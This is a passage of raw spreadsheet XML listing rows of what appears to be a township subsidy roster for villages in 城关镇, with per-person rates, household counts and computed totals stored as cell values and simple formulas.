      <c r="C203" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D203" s="24" t="s">
        <v>734</v>
      </c>
      <c r="E203" s="24" t="s">
        <v>269</v>
      </c>
      <c r="F203" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G203" s="24">
        <v>1</v>
      </c>
      <c r="H203" s="25">
        <v>365</v>
      </c>
      <c r="I203" s="24">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J203" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K203" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="204" customHeight="1" spans="1:11">
      <c r="A204" s="23" t="s">
        <v>735</v>
      </c>
      <c r="B204" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C204" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D204" s="24" t="s">
        <v>736</v>
      </c>
      <c r="E204" s="24" t="s">
        <v>737</v>
      </c>
      <c r="F204" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G204" s="24">
        <v>2</v>
      </c>
      <c r="H204" s="25">
        <v>325</v>
      </c>
      <c r="I204" s="24">
        <f t="shared" si="3"/>
        <v>650</v>
      </c>
      <c r="J204" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K204" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="205" customHeight="1" spans="1:11">
      <c r="A205" s="23" t="s">
        <v>738</v>
      </c>
      <c r="B205" s="24" t="str">
        <f>B204</f>
        <v>城关镇</v>
      </c>
      <c r="C205" s="24" t="str">
        <f>C204</f>
        <v>中华村</v>
      </c>
      <c r="D205" s="23" t="s">
        <v>739</v>
      </c>
      <c r="E205" s="23" t="s">
        <v>740</v>
      </c>
      <c r="F205" s="24" t="str">
        <f>F204</f>
        <v>4113210108</v>
      </c>
      <c r="G205" s="24"/>
      <c r="H205" s="24"/>
      <c r="I205" s="24">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="J205" s="24"/>
      <c r="K205" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="206" customHeight="1" spans="1:11">
      <c r="A206" s="23" t="s">
        <v>741</v>
      </c>
      <c r="B206" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C206" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D206" s="24" t="s">
        <v>742</v>
      </c>
      <c r="E206" s="24" t="s">
        <v>479</v>
      </c>
      <c r="F206" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G206" s="24">
        <v>2</v>
      </c>
      <c r="H206" s="25">
        <v>325</v>
      </c>
      <c r="I206" s="24">
        <f t="shared" si="3"/>
        <v>650</v>
      </c>
      <c r="J206" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K206" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="207" customHeight="1" spans="1:11">
      <c r="A207" s="23" t="s">
        <v>743</v>
      </c>
      <c r="B207" s="24" t="str">
        <f>B206</f>
        <v>城关镇</v>
      </c>
      <c r="C207" s="24" t="str">
        <f>C206</f>
        <v>西北村</v>
      </c>
      <c r="D207" s="23" t="s">
        <v>744</v>
      </c>
      <c r="E207" s="23" t="s">
        <v>288</v>
      </c>
      <c r="F207" s="24" t="str">
        <f>F206</f>
        <v>4113210106</v>
      </c>
      <c r="G207" s="24"/>
      <c r="H207" s="24"/>
      <c r="I207" s="24">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="J207" s="24"/>
      <c r="K207" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="208" customHeight="1" spans="1:11">
      <c r="A208" s="23" t="s">
        <v>745</v>
      </c>
      <c r="B208" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C208" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D208" s="24" t="s">
        <v>746</v>
      </c>
      <c r="E208" s="24" t="s">
        <v>273</v>
      </c>
      <c r="F208" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G208" s="24">
        <v>1</v>
      </c>
      <c r="H208" s="25">
        <v>365</v>
      </c>
      <c r="I208" s="24">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J208" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K208" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="209" customHeight="1" spans="1:11">
      <c r="A209" s="23" t="s">
        <v>747</v>
      </c>
      <c r="B209" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C209" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D209" s="24" t="s">
        <v>748</v>
      </c>
      <c r="E209" s="24" t="s">
        <v>382</v>
      </c>
      <c r="F209" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G209" s="24">
        <v>1</v>
      </c>
      <c r="H209" s="25">
        <v>365</v>
      </c>
      <c r="I209" s="24">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J209" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K209" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="210" customHeight="1" spans="1:11">
      <c r="A210" s="23" t="s">
        <v>749</v>
      </c>
      <c r="B210" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C210" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D210" s="24" t="s">
        <v>750</v>
      </c>
      <c r="E210" s="24" t="s">
        <v>273</v>
      </c>
      <c r="F210" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G210" s="24">
        <v>1</v>
      </c>
      <c r="H210" s="25">
        <v>365</v>
      </c>
      <c r="I210" s="24">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J210" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K210" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="211" customHeight="1" spans="1:11">
      <c r="A211" s="23" t="s">
        <v>751</v>
      </c>
      <c r="B211" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C211" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D211" s="24" t="s">
        <v>752</v>
      </c>
      <c r="E211" s="24" t="s">
        <v>753</v>
      </c>
      <c r="F211" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G211" s="24">
        <v>1</v>
      </c>
      <c r="H211" s="25">
        <v>365</v>
      </c>
      <c r="I211" s="24">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J211" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K211" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="212" customHeight="1" spans="1:11">
      <c r="A212" s="23" t="s">
        <v>754</v>
      </c>
      <c r="B212" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C212" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D212" s="24" t="s">
        <v>755</v>
      </c>
      <c r="E212" s="24" t="s">
        <v>572</v>
      </c>
      <c r="F212" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G212" s="24">
        <v>1</v>
      </c>
      <c r="H212" s="25">
        <v>365</v>
      </c>
      <c r="I212" s="24">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J212" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K212" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="213" customHeight="1" spans="1:11">
      <c r="A213" s="23" t="s">
        <v>756</v>
      </c>
      <c r="B213" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C213" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D213" s="24" t="s">
        <v>757</v>
      </c>
      <c r="E213" s="24" t="s">
        <v>249</v>
      </c>
      <c r="F213" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G213" s="24">
        <v>1</v>
      </c>
      <c r="H213" s="25">
        <v>365</v>
      </c>
      <c r="I213" s="24">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J213" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K213" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="214" customHeight="1" spans="1:11">
      <c r="A214" s="23" t="s">
        <v>758</v>
      </c>
      <c r="B214" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C214" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D214" s="24" t="s">
        <v>759</v>
      </c>
      <c r="E214" s="24" t="s">
        <v>284</v>
      </c>
      <c r="F214" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G214" s="24">
        <v>2</v>
      </c>
      <c r="H214" s="25">
        <v>325</v>
      </c>
      <c r="I214" s="24">
        <f t="shared" si="3"/>
        <v>650</v>
      </c>
      <c r="J214" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K214" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="215" customHeight="1" spans="1:11">
      <c r="A215" s="23" t="s">
        <v>760</v>
      </c>
      <c r="B215" s="24" t="str">
        <f>B214</f>
        <v>城关镇</v>
      </c>
      <c r="C215" s="24" t="str">
        <f>C214</f>
        <v>中华村</v>
      </c>
      <c r="D215" s="23" t="s">
        <v>761</v>
      </c>
      <c r="E215" s="23" t="s">
        <v>762</v>
      </c>
      <c r="F215" s="24" t="str">
        <f>F214</f>
        <v>4113210108</v>
      </c>
      <c r="G215" s="24"/>
      <c r="H215" s="24"/>
      <c r="I215" s="24">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="J215" s="24"/>
      <c r="K215" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="216" customHeight="1" spans="1:11">
      <c r="A216" s="23" t="s">
        <v>763</v>
      </c>
      <c r="B216" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C216" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D216" s="24" t="s">
        <v>764</v>
      </c>
      <c r="E216" s="24" t="s">
        <v>765</v>
      </c>
      <c r="F216" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G216" s="24">
        <v>1</v>
      </c>
      <c r="H216" s="25">
        <v>365</v>
      </c>
      <c r="I216" s="24">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J216" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K216" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="217" customHeight="1" spans="1:11">
      <c r="A217" s="23" t="s">
        <v>766</v>
      </c>
      <c r="B217" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C217" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D217" s="24" t="s">
        <v>767</v>
      </c>
      <c r="E217" s="24" t="s">
        <v>265</v>
      </c>
      <c r="F217" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G217" s="24">
        <v>2</v>
      </c>
      <c r="H217" s="25">
        <v>325</v>
      </c>
      <c r="I217" s="24">
        <f t="shared" si="3"/>
        <v>650</v>
      </c>
      <c r="J217" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K217" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="218" customHeight="1" spans="1:11">
      <c r="A218" s="23" t="s">
        <v>768</v>
      </c>
      <c r="B218" s="24" t="str">
        <f>B217</f>
        <v>城关镇</v>
      </c>
      <c r="C218" s="24" t="str">
        <f>C217</f>
        <v>中华村</v>
      </c>
      <c r="D218" s="23" t="s">
        <v>769</v>
      </c>
      <c r="E218" s="23" t="s">
        <v>303</v>
      </c>
      <c r="F218" s="24" t="str">
        <f>F217</f>
        <v>4113210108</v>
      </c>
      <c r="G218" s="24"/>
      <c r="H218" s="24"/>
      <c r="I218" s="24">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="J218" s="24"/>
      <c r="K218" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="219" customHeight="1" spans="1:11">
      <c r="A219" s="23" t="s">
        <v>770</v>
      </c>
      <c r="B219" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C219" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D219" s="24" t="s">
        <v>771</v>
      </c>
      <c r="E219" s="24" t="s">
        <v>772</v>
      </c>
      <c r="F219" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G219" s="24">
        <v>2</v>
      </c>
      <c r="H219" s="25">
        <v>325</v>
      </c>
      <c r="I219" s="24">
        <f t="shared" si="3"/>
        <v>650</v>
      </c>
      <c r="J219" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K219" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="220" customHeight="1" spans="1:11">
      <c r="A220" s="23" t="s">
        <v>773</v>
      </c>
      <c r="B220" s="24" t="str">
        <f>B219</f>
        <v>城关镇</v>
      </c>
      <c r="C220" s="24" t="str">
        <f>C219</f>
        <v>东北一组</v>
      </c>
      <c r="D220" s="23" t="s">
        <v>774</v>
      </c>
      <c r="E220" s="23" t="s">
        <v>346</v>
      </c>
      <c r="F220" s="24" t="str">
        <f>F219</f>
        <v>4113210103</v>
      </c>
      <c r="G220" s="24"/>
      <c r="H220" s="24"/>
      <c r="I220" s="24">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="J220" s="24"/>
      <c r="K220" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="221" customHeight="1" spans="1:11">
      <c r="A221" s="23" t="s">
        <v>775</v>
      </c>
      <c r="B221" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C221" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D221" s="24" t="s">
        <v>776</v>
      </c>
      <c r="E221" s="24" t="s">
        <v>627</v>
      </c>
      <c r="F221" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G221" s="24">
        <v>2</v>
      </c>
      <c r="H221" s="25">
        <v>325</v>
      </c>
      <c r="I221" s="24">
        <f t="shared" si="3"/>
        <v>650</v>
      </c>
      <c r="J221" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K221" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="222" customHeight="1" spans="1:11">
      <c r="A222" s="23" t="s">
        <v>777</v>
      </c>
      <c r="B222" s="24" t="str">
        <f>B221</f>
        <v>城关镇</v>
      </c>
      <c r="C222" s="24" t="str">
        <f>C221</f>
        <v>西北村</v>
      </c>
      <c r="D222" s="23" t="s">
        <v>778</v>
      </c>
      <c r="E222" s="23" t="s">
        <v>239</v>
      </c>
      <c r="F222" s="24" t="str">
        <f>F221</f>
        <v>4113210106</v>
      </c>
      <c r="G222" s="24"/>
      <c r="H222" s="24"/>
      <c r="I222" s="24">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="J222" s="24"/>
      <c r="K222" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="223" customHeight="1" spans="1:11">
      <c r="A223" s="23" t="s">
        <v>779</v>
      </c>
      <c r="B223" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C223" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D223" s="24" t="s">
        <v>780</v>
      </c>
      <c r="E223" s="24" t="s">
        <v>561</v>
      </c>
      <c r="F223" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G223" s="24">
        <v>2</v>
      </c>
      <c r="H223" s="25">
        <v>325</v>
      </c>
      <c r="I223" s="24">
        <f t="shared" si="3"/>
        <v>650</v>
      </c>
      <c r="J223" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K223" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="224" customHeight="1" spans="1:11">
      <c r="A224" s="23" t="s">
        <v>781</v>
      </c>
      <c r="B224" s="24" t="str">
        <f>B223</f>
        <v>城关镇</v>
      </c>
      <c r="C224" s="24" t="str">
        <f>C223</f>
        <v>中华村</v>
      </c>
      <c r="D224" s="23" t="s">
        <v>782</v>
      </c>
      <c r="E224" s="23" t="s">
        <v>783</v>
      </c>
      <c r="F224" s="24" t="str">
        <f>F223</f>
        <v>4113210108</v>
      </c>
      <c r="G224" s="24"/>
      <c r="H224" s="24"/>
      <c r="I224" s="24">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="J224" s="24"/>
      <c r="K224" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="225" customHeight="1" spans="1:11">
      <c r="A225" s="23" t="s">
        <v>784</v>
      </c>
      <c r="B225" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C225" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D225" s="24" t="s">
        <v>785</v>
      </c>
      <c r="E225" s="24" t="s">
        <v>435</v>
      </c>
      <c r="F225" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G225" s="24">
        <v>1</v>
      </c>
      <c r="H225" s="25">
        <v>365</v>
      </c>
      <c r="I225" s="24">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J225" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K225" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="226" customHeight="1" spans="1:11">
      <c r="A226" s="23" t="s">
        <v>786</v>
      </c>
      <c r="B226" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C226" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D226" s="24" t="s">
        <v>787</v>
      </c>
      <c r="E226" s="24" t="s">
        <v>292</v>
      </c>
      <c r="F226" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G226" s="24">
        <v>1</v>
      </c>
      <c r="H226" s="25">
        <v>365</v>
      </c>
      <c r="I226" s="24">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J226" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K226" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="227" customHeight="1" spans="1:11">
      <c r="A227" s="23" t="s">
        <v>788</v>
      </c>
      <c r="B227" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C227" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D227" s="24" t="s">
        <v>789</v>
      </c>
      <c r="E227" s="24" t="s">
        <v>340</v>
      </c>
      <c r="F227" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G227" s="24">
        <v>1</v>
      </c>
      <c r="H227" s="25">
        <v>365</v>
      </c>
      <c r="I227" s="24">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J227" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K227" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="228" customHeight="1" spans="1:11">
      <c r="A228" s="23" t="s">
        <v>790</v>
      </c>
      <c r="B228" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C228" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D228" s="24" t="s">
        <v>791</v>
      </c>
      <c r="E228" s="24" t="s">
        <v>232</v>
      </c>
      <c r="F228" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G228" s="24">
        <v>2</v>
      </c>
      <c r="H228" s="25">
        <v>325</v>
      </c>
      <c r="I228" s="24">
        <f t="shared" si="3"/>
        <v>650</v>
      </c>
      <c r="J228" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K228" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="229" customHeight="1" spans="1:11">
      <c r="A229" s="23" t="s">
        <v>792</v>
      </c>
      <c r="B229" s="24" t="str">
        <f>B228</f>
        <v>城关镇</v>
      </c>
      <c r="C229" s="24" t="str">
        <f>C228</f>
        <v>北外村</v>
      </c>
      <c r="D229" s="33" t="s">
        <v>793</v>
      </c>
      <c r="E229" s="33" t="s">
        <v>239</v>
      </c>
      <c r="F229" s="24" t="str">
        <f>F228</f>
        <v>4113210102</v>
      </c>
      <c r="G229" s="24"/>
      <c r="H229" s="24"/>
      <c r="I229" s="24">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="J229" s="24"/>
      <c r="K229" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="230" customHeight="1" spans="1:11">
      <c r="A230" s="23" t="s">
        <v>794</v>
      </c>
      <c r="B230" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C230" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D230" s="24" t="s">
        <v>795</v>
      </c>
      <c r="E230" s="24" t="s">
        <v>331</v>
      </c>
      <c r="F230" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G230" s="24">
        <v>2</v>
      </c>
      <c r="H230" s="25">
        <v>325</v>
      </c>
      <c r="I230" s="24">
        <f t="shared" si="3"/>
        <v>650</v>
      </c>
      <c r="J230" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K230" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="231" customHeight="1" spans="1:11">
      <c r="A231" s="23" t="s">
        <v>796</v>
      </c>
      <c r="B231" s="24" t="str">
        <f>B230</f>
        <v>城关镇</v>
      </c>
      <c r="C231" s="24" t="str">
        <f>C230</f>
        <v>北外村</v>
      </c>
      <c r="D231" s="23" t="s">
        <v>797</v>
      </c>
      <c r="E231" s="23" t="s">
        <v>798</v>
      </c>
      <c r="F231" s="24" t="str">
        <f>F230</f>
        <v>4113210102</v>
      </c>
      <c r="G231" s="24"/>
      <c r="H231" s="24"/>
      <c r="I231" s="24">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="J231" s="24"/>
      <c r="K231" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="232" customHeight="1" spans="1:11">
      <c r="A232" s="23" t="s">
        <v>799</v>
      </c>
      <c r="B232" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C232" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D232" s="24" t="s">
        <v>800</v>
      </c>
      <c r="E232" s="24" t="s">
        <v>269</v>
      </c>
      <c r="F232" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G232" s="24">
        <v>1</v>
      </c>
      <c r="H232" s="25">
        <v>365</v>
      </c>
      <c r="I232" s="24">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J232" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K232" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="233" customHeight="1" spans="1:11">
      <c r="A233" s="23" t="s">
        <v>801</v>
      </c>
      <c r="B233" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C233" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D233" s="24" t="s">
        <v>802</v>
      </c>
      <c r="E233" s="24" t="s">
        <v>803</v>
      </c>
      <c r="F233" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G233" s="24">
        <v>2</v>
      </c>
      <c r="H233" s="25">
        <v>325</v>
      </c>
      <c r="I233" s="24">
        <f t="shared" si="3"/>
        <v>650</v>
      </c>
      <c r="J233" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K233" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="234" customHeight="1" spans="1:11">
      <c r="A234" s="23" t="s">
        <v>804</v>
      </c>
      <c r="B234" s="24" t="str">
        <f>B233</f>
        <v>城关镇</v>
      </c>
      <c r="C234" s="24" t="str">
        <f>C233</f>
        <v>中华村</v>
      </c>
      <c r="D234" s="23" t="s">
        <v>805</v>
      </c>
      <c r="E234" s="23" t="s">
        <v>806</v>
      </c>
      <c r="F234" s="24" t="str">
        <f>F233</f>
        <v>4113210108</v>
      </c>
      <c r="G234" s="24"/>
      <c r="H234" s="24"/>
      <c r="I234" s="24">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="J234" s="24"/>
      <c r="K234" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="235" customHeight="1" spans="1:11">
      <c r="A235" s="23" t="s">
        <v>807</v>
      </c>
      <c r="B235" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C235" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D235" s="24" t="s">
        <v>808</v>
      </c>
      <c r="E235" s="24" t="s">
        <v>236</v>
      </c>
      <c r="F235" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G235" s="24">
        <v>1</v>
      </c>
      <c r="H235" s="25">
        <v>365</v>
      </c>
      <c r="I235" s="24">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J235" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K235" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="236" customHeight="1" spans="1:11">
      <c r="A236" s="23" t="s">
        <v>809</v>
      </c>
      <c r="B236" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C236" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D236" s="24" t="s">
        <v>810</v>
      </c>
      <c r="E236" s="24" t="s">
        <v>288</v>
      </c>
      <c r="F236" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G236" s="24">
        <v>3</v>
      </c>
      <c r="H236" s="25">
        <v>320</v>
      </c>
      <c r="I236" s="24">
        <f t="shared" si="3"/>
        <v>960</v>
      </c>
      <c r="J236" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K236" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="237" customHeight="1" spans="1:11">
      <c r="A237" s="23" t="s">
        <v>811</v>
      </c>
      <c r="B237" s="24" t="str">
        <f>B236</f>
        <v>城关镇</v>
      </c>
      <c r="C237" s="24" t="str">
        <f>C236</f>
        <v>中华村</v>
      </c>
      <c r="D237" s="23" t="s">
        <v>812</v>
      </c>
      <c r="E237" s="23" t="s">
        <v>813</v>
      </c>
      <c r="F237" s="24" t="str">
        <f>F236</f>
        <v>4113210108</v>
      </c>
      <c r="G237" s="24"/>
      <c r="H237" s="24"/>
      <c r="I237" s="24">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="J237" s="24"/>
      <c r="K237" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="238" customHeight="1" spans="1:11">
      <c r="A238" s="23" t="s">
        <v>814</v>
      </c>
      <c r="B238" s="24" t="str">
        <f>B237</f>
        <v>城关镇</v>
      </c>
      <c r="C238" s="24" t="str">
        <f>C237</f>
        <v>中华村</v>
      </c>
      <c r="D238" s="26" t="s">
        <v>815</v>
      </c>
      <c r="E238" s="26" t="s">
        <v>597</v>
      </c>
      <c r="F238" s="24" t="str">
        <f>F237</f>
        <v>4113210108</v>
      </c>
      <c r="G238" s="24"/>
      <c r="H238" s="24"/>
      <c r="I238" s="24">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="J238" s="24"/>
      <c r="K238" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="239" customHeight="1" spans="1:11">
      <c r="A239" s="23" t="s">
        <v>816</v>
      </c>
      <c r="B239" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C239" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D239" s="24" t="s">
        <v>817</v>
      </c>
      <c r="E239" s="24" t="s">
        <v>606</v>
      </c>
      <c r="F239" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G239" s="24">
        <v>1</v>
      </c>
      <c r="H239" s="25">
        <v>375</v>
      </c>
      <c r="I239" s="24">
        <f t="shared" si="3"/>
        <v>375</v>
      </c>
      <c r="J239" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K239" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="240" customHeight="1" spans="1:11">
      <c r="A240" s="23" t="s">
        <v>818</v>
      </c>
      <c r="B240" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C240" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D240" s="24" t="s">
        <v>819</v>
      </c>
      <c r="E240" s="24" t="s">
        <v>820</v>
      </c>
      <c r="F240" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G240" s="24">
        <v>1</v>
      </c>
      <c r="H240" s="25">
        <v>365</v>
      </c>
      <c r="I240" s="24">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J240" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K240" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="241" customHeight="1" spans="1:11">
      <c r="A241" s="23" t="s">
        <v>821</v>
      </c>
      <c r="B241" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C241" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D241" s="24" t="s">
        <v>822</v>
      </c>
      <c r="E241" s="24" t="s">
        <v>540</v>
      </c>
      <c r="F241" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G241" s="24">
        <v>1</v>
      </c>
      <c r="H241" s="25">
        <v>365</v>
      </c>
      <c r="I241" s="24">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J241" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K241" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="242" customHeight="1" spans="1:11">
      <c r="A242" s="23" t="s">
        <v>823</v>
      </c>
      <c r="B242" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C242" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D242" s="24" t="s">
        <v>824</v>
      </c>
      <c r="E242" s="24" t="s">
        <v>578</v>
      </c>
      <c r="F242" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G242" s="24">
        <v>3</v>
      </c>
      <c r="H242" s="25">
        <v>290</v>
      </c>
      <c r="I242" s="24">
        <f t="shared" si="3"/>
        <v>870</v>
      </c>
      <c r="J242" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K242" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="243" customHeight="1" spans="1:11">
      <c r="A243" s="23" t="s">
        <v>825</v>
      </c>
      <c r="B243" s="24" t="str">
        <f>B242</f>
        <v>城关镇</v>
      </c>
      <c r="C243" s="24" t="str">
        <f>C242</f>
        <v>北外村</v>
      </c>
      <c r="D243" s="23" t="s">
        <v>826</v>
      </c>
      <c r="E243" s="23" t="s">
        <v>827</v>
      </c>
      <c r="F243" s="24" t="str">
        <f>F242</f>
        <v>4113210102</v>
      </c>
      <c r="G243" s="24"/>
